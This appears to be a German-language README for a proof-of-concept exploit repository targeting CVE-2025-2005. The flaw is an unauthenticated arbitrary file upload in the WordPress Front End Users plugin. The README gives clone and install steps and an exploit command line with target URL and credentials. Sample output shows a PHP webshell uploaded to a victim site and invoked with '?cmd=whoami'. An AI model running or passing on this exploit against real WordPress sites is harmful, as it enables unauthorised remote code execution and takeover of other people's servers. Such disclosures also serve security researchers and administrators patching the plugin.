
WordPress FEUP Exploit für beliebigen Datei-Upload (CVE-2025-2005)
Dieses Repository bietet einen Proof-of-Concept (PoC)-Exploit für das WordPress Front End Users Plugin (Versionen bis 3.2.32), das aufgrund fehlender MIME-/Dateityp-Überprüfung im Registrierungsformular anfällig für beliebigen Datei-Upload ist. Dadurch können nicht authentifizierte Angreifer schädliche Dateien (z. B. Webshells) hochladen, was potenziell zu Remote Code Execution (RCE) auf dem Server führen kann.
/register/
/signup/
pip install requests beautifulsoup4
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
python3 exploit.py --url http://target.com --user hacker --password pass123
[*] Scanne Website: http://victim.com
[*] 17 Seiten gefunden.
[+] Registrierungsformular gefunden unter: http://victim.com/register
[*] Lade Shell hoch...
[+] Shell erfolgreich hochgeladen!
Ort ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
AUSFÜHREN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami